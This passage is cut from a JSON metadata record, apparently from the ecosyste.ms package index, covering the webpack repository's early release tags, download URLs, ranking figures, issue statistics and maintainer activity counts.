itHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-23T01:24:47.573Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":2,"rankings":{"downloads":null,"dependent_repos_count":3.4795809262391884,"dependent_packages_count":9.561217324694391,"stargazers_count":0.01136089579666787,"forks_count":0.023419390458043414,"docker_downloads_count":null,"average":3.2688946342970726},"purl":"pkg:golang/github.com/webpack/webpack","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/webpack/webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/webpack/webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/webpack/webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":416,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":82,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fwebpack%2Fwebpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fwebpack%2Fwebpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fwebpack%2Fwebpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fwebpack%2Fwebpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fwebpack%2Fwebpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fwebpack%2Fwebpack/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2282221,"maintainers_count":0,"namespaces_count":839585,"keywords_count":126348,"github":"golang","metada